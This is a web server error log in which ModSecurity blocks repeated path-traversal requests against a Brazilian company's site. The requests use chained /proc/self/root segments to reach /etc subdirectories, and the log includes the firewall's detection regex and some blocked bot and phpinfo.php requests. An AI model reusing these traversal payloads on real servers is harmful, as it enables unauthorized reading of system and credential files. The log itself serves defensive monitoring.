https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:31:03.007446 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:44682] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUJ_9ocpUE4ed4uDznvQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:31:05.535116 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.241.46:44692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUKQlT9VtDQc7bgUynLAAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:06.869587 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:44708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUKpqj1wV0Si-OkefkQwAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:10.240889 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:33644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgULpqj1wV0Si-OkefkRgAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:31:11.516320 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.241.46:33656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgULwlT9VtDQc7bgUynNAAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:16.622837 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.228.16:48078] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgUNAlT9VtDQc7bgUynNwAAAQI"]
[Mon Mar 16 11:31:17.287235 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:33668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUNZqj1wV0Si-OkefkTQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:31:19.684485 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:53960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUN9SswJuvopo3lOhYFwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:41.224376 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:53974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUTbABkC4fWIHEf8HjoAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:50.204328 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:59332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUVglT9VtDQc7bgUynSgAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:54.183459 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:40840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUWnbQATo66fKoS7xGcQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:31:56.252121 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:40844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUW7ABkC4fWIHEf8HjpQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:32:39.410096 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:40852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUhv9ocpUE4ed4uDzoBQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:32:53.543345 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:44050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUlbysWC90G-1nBrA98AAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:32:56.994604 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:42806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUmAlT9VtDQc7bgUynXwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:33:04.703382 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.241.46:56008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUoHjZBu2q05ozVU9PDgAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:33:07.304753 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:56024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUo3bQATo66fKoS7xGgQAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:33:12.829650 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:37970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUqHjZBu2q05ozVU9PFwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:33:16.223017 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:37976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUrHjZBu2q05ozVU9PGwAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:33:31.415277 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:37992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUu3bQATo66fKoS7xGowAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:33:37.065154 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:40792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUwY6lpbStxTqkSktlxgAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:33:47.065844 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.244.31:49506] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgUy46lpbStxTqkSktlyQAAAlI"]
[Mon Mar 16 11:33:51.385572 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:41266] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUz7ysWC90G-1nBrA-HQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:33:52.683693 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.241.46:58332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgU0Jqj1wV0Si-OkefkmwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:34:07.007808 2026] [access_compat:error] [pid 10831:tid 140411582465792] [client 185.177.72.22:50268] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/phpinfo.php
